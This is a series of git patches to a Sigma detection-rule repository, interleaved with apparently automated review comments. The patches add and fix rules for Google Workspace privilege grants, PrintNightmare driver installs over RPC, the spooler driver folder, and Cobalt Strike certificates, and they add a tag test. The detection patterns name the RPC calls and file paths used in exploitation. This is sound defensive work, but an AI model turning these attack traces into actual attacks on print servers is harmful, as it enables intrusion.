diff --git a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml index 39d05f14..c0b1f470 100644 --- a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml +++ b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml @@ -12,7 +12,9 @@ logsource: detection: selection: eventService: admin.googleapis.com - eventName: GRANT_ADMIN_PRIVILEGE + eventName: + - GRANT_DELEGATED_ADMIN_PRIVILEGES + - GRANT_ADMIN_PRIVILEGE condition: selection level: medium tags: From 3cd43bfd9b04f18fb84620a853f74351e62700a3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 21:19:44 -0500 Subject: [PATCH 0546/1367] Create gworkspace_granted_domain_api_access.yml --- .../gworkspace_granted_domain_api_access.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml diff --git a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml new file mode 100644 index 00000000..8857a874 --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -0,0 +1,23 @@ +title: Google Workspace Granted Domain API Access +id: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba +description: Detects when an API access service account is granted domain authority. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#AUTHORIZE_API_CLIENT_ACCESS +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: AUTHORIZE_API_CLIENT_ACCESS + condition: selection +level: medium +tags: + - attack.persistence + - atack.t1098 +falsepositives: + - Unknown + 
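Review bot: The tag `atack.t1098` in the new gworkspace_granted_domain_api_access.yml is misspelled, so tooling that groups rules by ATT&CK technique will not associate this rule with T1098; it should read `- attack.t1098`. The file also ends with a stray empty `+` line after `- Unknown`. Authorising domain-wide API client access is a high-impact persistence path, so `level: medium` may be worth revisiting once the rule has been tested.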
From facd58bd0ad5972bb8c723075b38b01f2a0e8b67 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 21:19:51 -0500 Subject: [PATCH 0547/1367] Delete gworkspace_user_granted_admin_privileges.yml --- ...orkspace_user_granted_admin_privileges.yml | 24 ------------------- 1 file changed, 24 deletions(-) delete mode 100644 rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml diff --git a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml deleted file mode 100644 index c0b1f470..00000000 --- a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Google Workspace User Granted Admin Privileges -id: 2d1b83e4-17c6-4896-a37b-29140b40a788 -description: Detects when an Google Workspace user is granted admin privileges. -author: Austin Songer -status: experimental -date: 2021/08/23 -references: - - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE -logsource: - service: google_workspace.admin -detection: - selection: - eventService: admin.googleapis.com - eventName: - - GRANT_DELEGATED_ADMIN_PRIVILEGES - - GRANT_ADMIN_PRIVILEGE - condition: selection -level: medium -tags: - - attack.persistence - - attack.t1098 -falsepositives: - - Google Workspace admin role privileges, may be modified by system administrators. From 9e588fdcf68ba9fc485e03bcf4a7fd10e8d81b75 Mon Sep 17 00:00:00 2001 
From: neu5ron Date: Tue, 24 Aug 2021 00:58:36 -0400 Subject: [PATCH 0548/1367] Zeek dce_rpc.log Detection of print driver installs over RPC (ie: possible PrintNightmare) using the three existing known RPC functions, as well as few others "discussed" but not directly related to PrintNightmare PoC or public post-compromise write-ups. --- ...pc_printnightmare_print_driver_install.yml | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml new file mode 100644 index 00000000..390edb4d --- /dev/null +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml 
@@ -0,0 +1,45 @@ +title: Possible PrintNightmare Print Driver Install +id: 7b33baef-2a75-4ca3-9da4-34f9a15382d8 +description: | + Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). + The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. +author: '@neu5ron (Nate Guagenti)' +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29 + - https://github.com/zeek/zeek/blob/master/scripts/base/protocols/dce-rpc/consts.zeek + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 + - https://github.com/corelight/CVE-2021-1675 + - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml + - https://old.zeek.org/zeekweek2019/slides/bzar.pdf + - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ + - +tags: + - attack.execution + - cve.2021-1675 + - cve.2021-1678 +logsource: + product: zeek + service: dce_rpc +detection: + printer_operation: + operation: + - "RpcAsyncInstallPrinterDriverFromPackage" # "76f03f96-cdfd-44fc-a22c-64950a001209",0x3e + - "RpcAsyncAddPrintProcessor" # "76f03f96-cdfd-44fc-a22c-64950a001209",0x2c + - "RpcAddPrintProcessor" # "12345678-1234-abcd-ef00-0123456789ab",0x0e + - "RpcAddPrinterDriverEx" # "12345678-1234-abcd-ef00-0123456789ab",0x59 + - "RpcAddPrinterDriver" # "12345678-1234-abcd-ef00-0123456789ab",0x09 + - "RpcAsyncAddPrinterDriver" # "76f03f96-cdfd-44fc-a22c-64950a001209",0x27 + condition: printer_operation +falsepositives: + - Legitimate remote alteration of a printer driver. +level: medium +fields: + - id.orig_h + - id.resp_h + - id.resp_p + - operation + - endpoint + - named_pipe + - uid +status: stable \ No newline at end of file 
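Review bot: The `references:` list in the new zeek_dce_rpc_printnightmare_print_driver_install.yml ends with a bare `- ` item after the crowdstrike URL, which YAML parses as a null entry and which backends will emit as `null`; delete that line (patch 0550 later in this series does exactly that). The description names only CVE-2021-1675 while the tags also carry `cve.2021-1678` and the references cite the MSRC advisory for CVE-2021-34527, so the identifiers are inconsistent across the rule; a description such as `exploitation of PrintNightmare (CVE-2021-1675 / CVE-2021-34527)` and a matching tag set would keep them aligned. The file also ends without a trailing newline.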
From d8befe3a13f29b100b78c5f9534b769124a5c3d2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 07:34:33 +0200 Subject: [PATCH 0549/1367] Update References --- rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml index 8857a874..e1602e38 100644 --- a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml +++ b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -6,7 +6,7 @@ status: experimental date: 2021/08/23 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#AUTHORIZE_API_CLIENT_ACCESS + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS logsource: service: google_workspace.admin detection: From be43ecd70db63098b7209f2e596ef68c4978ca74 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 07:57:16 +0200 Subject: [PATCH 0550/1367] Remove empty element in list Otherwise get a `null` when convert to some backend (es-rule,...) --- .../zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index 390edb4d..e6e84085 100644 --- a/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml 
@@ -13,7 +13,6 @@ references: - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml - https://old.zeek.org/zeekweek2019/slides/bzar.pdf - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ - - tags: - attack.execution - cve.2021-1675 @@ -42,4 +41,4 @@ fields: - endpoint - named_pipe - uid -status: stable \ No newline at end of file +status: stable From 8ab90d801293189a4486e2d8a397ffe1d9396db1 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 07:59:36 +0200 Subject: [PATCH 0551/1367] add modified --- rules/network/zeek/zeek_default_cobalt_strike_certificate.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml index 97460495..ed328eeb 100644 --- a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml +++ b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml @@ -2,7 +2,8 @@ title: Default Cobalt Strike Certificate id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic author: Bhabesh Raj -date: 2021/08/26 +date: 2021/06/23 +modified: 2021/08/24 references: - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 tags: From 4ee4f12f308f2da69cad4ab135f7ad9a433c86a0 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 08:01:01 +0200 Subject: [PATCH 0552/1367] add modified --- rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml b/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml index a8853b8e..c4ee427d 100644 
--- a/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml +++ b/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml @@ -9,7 +9,8 @@ references: tags: - attack.lateral_movement - attack.t1021.002 -date: 2021/08/23 +date: 2018/11/28 +modified: 2021/08/23 logsource: product: zeek service: smb_files From 15aa0cb70ee920560b2476f049663053fc6be551 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 08:02:24 +0200 Subject: [PATCH 0553/1367] add modified --- rules/network/zeek/zeek_dns_mining_pools.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 91d87824..c6d11204 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -4,6 +4,7 @@ description: Identifies clients that may be performing DNS lookups associated wi references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml date: 2021/08/19 +modified: 2021/08/23 author: Saw Winn Naung, Azure-Sentinel, @neu5ron level: low logsource: From 272625a0052f6c0ecfa07b687a4452177bfa51f8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 24 Aug 2021 08:34:08 +0200 Subject: [PATCH 0554/1367] Update win_susp_splwow64.yml --- rules/windows/process_creation/win_susp_splwow64.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_splwow64.yml b/rules/windows/process_creation/win_susp_splwow64.yml index 3695fcec..38c4a4da 100644 --- a/rules/windows/process_creation/win_susp_splwow64.yml +++ b/rules/windows/process_creation/win_susp_splwow64.yml @@ -13,7 +13,7 @@ detection: selection: Image|endswith: '\splwow64.exe' filter: - CommandLine|contains: 'splwow64.exe ' + CommandLine|endswith: 'splwow64.exe' condition: selection and not filter falsepositives: - Unknown 
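Review bot: The new filter `CommandLine|endswith: 'splwow64.exe'` in win_susp_splwow64.yml does not cover a quoted no-argument invocation such as `"...\splwow64.exe"`, whose command line ends with the closing quote, so that benign form would no longer be filtered and the rule would fire on it. Turning the value into a list keeps the intent and covers both spellings: `CommandLine|endswith:` / `  - 'splwow64.exe'` / `  - 'splwow64.exe"'`. Whether trailing whitespace can appear in the logged command line depends on the source and is worth confirming, since `endswith` would then miss too.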
From 8f85ac0fdefa0966399c9f71b0f7116851a644a1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 09:35:04 +0200 Subject: [PATCH 0555/1367] tags update --- rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml | 2 +- rules/web/web_cve_2018_2894_weblogic_exploit.yml | 2 +- rules/web/web_cve_2020_3452_cisco_asa_ftd.yml | 2 +- rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml | 2 +- rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml index e1602e38..0b09904b 100644 --- a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml +++ b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -17,7 +17,7 @@ detection: level: medium tags: - attack.persistence - - atack.t1098 + - attack.t1098 falsepositives: - Unknown diff --git a/rules/web/web_cve_2018_2894_weblogic_exploit.yml b/rules/web/web_cve_2018_2894_weblogic_exploit.yml index cb39d1fb..b2fcd3e7 100644 --- a/rules/web/web_cve_2018_2894_weblogic_exploit.yml +++ b/rules/web/web_cve_2018_2894_weblogic_exploit.yml @@ -9,6 +9,7 @@ references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894 - https://twitter.com/pyn3rd/status/1020620932967223296 - https://github.com/LandGrey/CVE-2018-2894 + - https://nvd.nist.gov/vuln/detail/cve-2018-2894 logsource: category: webserver detection: @@ -26,5 +27,4 @@ tags: - attack.t1190 - attack.initial_access - attack.persistence - - cve.2018-2894 - attack.t1505.003 diff --git a/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml b/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml index 8fb1ae92..f7ac95eb 100644 --- a/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml +++ b/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml 
@@ -8,6 +8,7 @@ references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452 - https://twitter.com/aboul3la/status/1286012324722155525 - https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter + - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 logsource: category: webserver detection: @@ -34,4 +35,3 @@ tags: - attack.t1100 # an old one - attack.t1190 - attack.initial_access - - cve.2020-3452 diff --git a/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml b/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml index 476408c2..df17a5de 100644 --- a/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml +++ b/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml @@ -7,6 +7,7 @@ date: 2021/01/20 references: - https://twitter.com/pyn3rd/status/1351696768065409026 - https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw + - https://nvd.nist.gov/vuln/detail/cve-2021-2109 logsource: category: webserver detection: @@ -26,4 +27,3 @@ level: critical tags: - attack.t1190 - attack.initial_access - - cve.2021-2109 diff --git a/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml b/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml index 8a240ab4..9da58de5 100644 --- a/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml +++ b/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml @@ -8,6 +8,7 @@ references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21978 - https://twitter.com/wugeej/status/1369476795255320580 - https://paper.seebug.org/1495/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-21978 logsource: category: webserver detection: @@ -27,4 +28,3 @@ level: high tags: - attack.initial_access - attack.t1190 - - cve.2021-21978 \ No newline at end of file From c2302a15dadc1063687846c8aaa1026633a4e778 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Tue, 24 Aug 2021 10:10:45 +0200 Subject: [PATCH 0556/1367] fix cve tags --- .../web_cve_2020_14882_weblogic_exploit.yml | 2 +- rules/web/web_cve_2021_26814_wzuh_rce.yml | 2 +- ...terramaster_cve_2020_28188_rce_exploit.yml | 2 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 4 ++-- tests/test_rules.py | 21 +++++++++++++++++++ 5 files changed, 26 insertions(+), 5 deletions(-) diff --git a/rules/web/web_cve_2020_14882_weblogic_exploit.yml b/rules/web/web_cve_2020_14882_weblogic_exploit.yml index 14afc0d1..cb3545ad 100644 --- a/rules/web/web_cve_2020_14882_weblogic_exploit.yml +++ b/rules/web/web_cve_2020_14882_weblogic_exploit.yml @@ -10,6 +10,7 @@ references: - https://isc.sans.edu/diary/26734 - https://twitter.com/jas502n/status/1321416053050667009?s=20 - https://twitter.com/sudo_sudoka/status/1323951871078223874 + - https://nvd.nist.gov/vuln/detail/cve-2020-14882 logsource: category: webserver detection: @@ -28,4 +29,3 @@ tags: - attack.t1100 # an old one - attack.t1190 - attack.initial_access - - cve.2020-14882 diff --git a/rules/web/web_cve_2021_26814_wzuh_rce.yml b/rules/web/web_cve_2021_26814_wzuh_rce.yml index 672226f4..03012d37 100644 --- a/rules/web/web_cve_2021_26814_wzuh_rce.yml +++ b/rules/web/web_cve_2021_26814_wzuh_rce.yml @@ -7,6 +7,7 @@ date: 2021/05/22 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-26814 - https://github.com/WickdDavid/CVE-2021-26814/blob/main/PoC.py + - https://nvd.nist.gov/vuln/detail/cve-2021-21978 logsource: category: webserver detection: @@ -22,4 +23,3 @@ level: high tags: - attack.initial_access - attack.t1190 - - cve.2021-21978 \ No newline at end of file diff --git a/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml b/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml index 931e2389..73316e52 100644 --- a/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml +++ b/rules/web/web_terramaster_cve_2020_28188_rce_exploit.yml 
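Review bot: The reference added to web_cve_2021_26814_wzuh_rce.yml points at the wrong CVE: `https://nvd.nist.gov/vuln/detail/cve-2021-21978` is the VMware View Planner identifier (the same link is added to web_cve_2021_21978_vmware_view_planner_exploit.yml in patch 0555), while this rule's filename and its existing mitre.org reference name 2021-26814. The removed tag `cve.2021-21978` carried the same mistake, so the commit moves the error from tags to references rather than fixing it. The line should read `- https://nvd.nist.gov/vuln/detail/cve-2021-26814`.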
@@ -8,6 +8,7 @@ references: - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28188 - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ + - https://nvd.nist.gov/vuln/detail/cve-2020-28188 logsource: category: webserver detection: @@ -34,4 +35,3 @@ level: critical tags: - attack.t1190 - attack.initial_access - - cve.2020-28188 diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml index f2ec067c..d0117429 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml @@ -9,12 +9,12 @@ modified: 2021/08/06 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ + - https://nvd.nist.gov/vuln/detail/cve-2021-33771 + - https://nvd.nist.gov/vuln/detail/cve-2021-31979 tags: - attack.credential_access - attack.t1566 - attack.t1203 - - cve.2021-33771 - - cve.2021-31979 - threat_group.Sourgum falsepositives: - Unlikely diff --git a/tests/test_rules.py b/tests/test_rules.py index d34bd849..eefaad4a 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
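Review bot: The added `- https://nvd.nist.gov/vuln/detail/cve-2020-28188` in web_terramaster_cve_2020_28188_rce_exploit.yml duplicates the `https://nvd.nist.gov/vuln/detail/CVE-2020-28188` entry already present two lines above in the same list, differing only in case. Drop the new line; the existing reference already serves the purpose of the removed `cve.2020-28188` tag.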
@@ -72,6 +72,27 @@ class TestRules(unittest.TestCase): self.assertEqual(files_with_legal_issues, [], Fore.RED + "There are rule files which contains a trademark or reference that doesn't comply with the respective trademark requirements - please remove the trademark to avoid legal issues") + + def test_optional_tags(self): + files_with_incorrect_tags = [] + + for file in self.yield_next_rule_file_path(self.path_to_rules): + tags = self.get_rule_part(file_path=file, part_name="tags") + if tags: + for tag in tags: + if tag.startswith("attack."): + continue + elif tag.startswith("car."): + continue + elif tag.startswith("cve."): + print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag)) + # files_with_incorrect_tags.append(file) + else: + print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag)) + # files_with_incorrect_tags.append(file) + + self.assertEqual(files_with_incorrect_tags, [], Fore.RED + + "There are rules with incorrect/unknown MITRE Tags. (please inform us about new tags that are not yet supported in our tests) and check the correct tags here: https://attack.mitre.org/ ") def test_confirm_correct_mitre_tags(self): files_with_incorrect_mitre_tags = [] From ace46c17bee09d8d331dcd22d5551b2516d26773 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 24 Aug 2021 10:27:27 +0200 Subject: [PATCH 0557/1367] Update cve tags --- .../win_exploit_cve_2021_1675_printspooler.yml | 2 +- ...xploit_cve_2021_1675_printspooler_Security.yml | 4 ++-- ...oit_cve_2021_1675_printspooler_operational.yml | 2 +- .../driver_load/sysmon_vuln_dell_driver_load.yml | 3 ++- .../win_cve_2021_1675_printspooler_del.yml | 11 +++++------ .../image_load/sysmon_spoolsv_dll_load.yml | 15 ++++++--------- .../win_susp_servu_process_pattern.yml | 3 ++- 7 files changed, 19 insertions(+), 21 deletions(-) 
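Review bot: `test_optional_tags` can never fail: both `files_with_incorrect_tags.append(file)` calls are commented out, so the `cve.` and unknown-tag branches only print and the final `assertEqual` always compares an empty list. If warning-only is intended, say so with a comment such as `# warning only: reported, not enforced` and reword the assertion message accordingly; otherwise enable the appends (patch 0558 later in this series enables only the `cve.` one, leaving unknown tags unenforced). The accepted prefixes `attack.` and `car.` also omit `threat_group.`, which rules touched by this same patch still carry (`threat_group.Sourgum` in sysmon_cve_2021_31979_cve_2021_33771_exploits.yml), so enabling the unknown-tag append would fail on them without an added `elif tag.startswith("threat_group."): continue`. The message `but is it a references` reads awkwardly; `Rule {} has the cve tag <{}>: move it to the references list (https://nvd.nist.gov/)` is clearer. The enclosing class TestRules starts outside the hunk.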
diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml index 62e12357..26866f88 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler.yml @@ -8,11 +8,11 @@ references: - https://github.com/hhlxf/PrintNightmare - https://github.com/afwu/PrintNightmare - https://twitter.com/fuzzyf10w/status/1410202370835898371 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/06/30 modified: 2021/07/08 tags: - attack.execution - - cve.2021-1675 logsource: product: windows service: printservice-admin diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml index ce921b98..d36b0ea4 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml @@ -6,11 +6,11 @@ status: experimental level: critical references: - https://twitter.com/INIT_3/status/1410662463641731075 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-34527 date: 2021/07/02 tags: - attack.execution - - cve.2021-1675 - - cve.2021-34527 logsource: product: windows service: security diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml index 9b2fa174..4fbbee51 100644 --- a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_operational.yml 
@@ -6,10 +6,10 @@ status: experimental level: critical references: - https://twitter.com/MalwareJake/status/1410421967463731200 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 date: 2021/07/01 tags: - attack.execution - - cve.2021-1675 logsource: product: windows service: printservice-operational diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml b/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml index 21868b8a..ea92afb4 100644 --- a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml +++ b/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml @@ -5,11 +5,12 @@ author: Florian Roth date: 2021/05/05 references: - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ + - https://nvd.nist.gov/vuln/detail/cve-2021-21551 logsource: category: driver_load product: windows tags: - - cve.2021-21551 + - attack.privilege_escalation detection: selection_image: ImageLoaded|contains: '\DBUtil_2_3.Sys' diff --git a/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml b/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml index 1b97f004..397a66b1 100644 --- a/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml +++ b/rules/windows/file_delete/win_cve_2021_1675_printspooler_del.yml 
@@ -5,24 +5,23 @@ description: Detect DLL deletions from Spooler Service driver folder references: - https://github.com/hhlxf/PrintNightmare - https://github.com/cube0x0/CVE-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 author: Bhabesh Raj date: 2021/07/01 +modified: 2021/08/24 tags: - attack.persistence - attack.defense_evasion - attack.privilege_escalation - attack.t1574 - - cve.2021-1675 logsource: category: file_delete product: windows detection: selection: - Image|endswith: - - 'spoolsv.exe' - TargetFilename|contains: - - 'C:\Windows\System32\spool\drivers\x64\3\' + Image|endswith: 'spoolsv.exe' + TargetFilename|contains: 'C:\Windows\System32\spool\drivers\x64\3\' condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/image_load/sysmon_spoolsv_dll_load.yml b/rules/windows/image_load/sysmon_spoolsv_dll_load.yml index e51c20cd..38e94f80 100644 --- a/rules/windows/image_load/sysmon_spoolsv_dll_load.yml +++ b/rules/windows/image_load/sysmon_spoolsv_dll_load.yml @@ -4,27 +4,24 @@ status: experimental description: Detect DLL Load from Spooler Service backup folder references: - https://github.com/hhlxf/PrintNightmare + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-34527 author: FPT.EagleEye, Thomas Patzke (improvements) date: 2021/06/29 -modified: 2021/07/08 +modified: 2021/08/24 tags: - attack.persistence - attack.defense_evasion - attack.privilege_escalation - attack.t1574 - - cve.2021-1675 - - cve.2021-34527 logsource: category: image_load product: windows detection: selection: - Image|endswith: - - 'spoolsv.exe' - ImageLoaded|contains: - - '\Windows\System32\spool\drivers\x64\3\' - ImageLoaded|endswith: - - '.dll' + Image|endswith: 'spoolsv.exe' + ImageLoaded|contains: '\Windows\System32\spool\drivers\x64\3\' + ImageLoaded|endswith: '.dll' condition: selection falsepositives: - Loading of legitimate driver 
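Review bot: The rewritten `TargetFilename|contains: 'C:\Windows\System32\spool\drivers\x64\3\'` in win_cve_2021_1675_printspooler_del.yml keeps a hard-coded drive letter, while the parallel rewrite in sysmon_spoolsv_dll_load.yml in this same commit uses `ImageLoaded|contains: '\Windows\System32\spool\drivers\x64\3\'` without one, so the two rules would behave differently on a host whose system drive is not C:. Dropping the `C:` prefix aligns the two and, with the `contains` modifier, only widens the match to other drive letters. Collapsing the single-item lists to scalars in both files is otherwise a welcome simplification.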
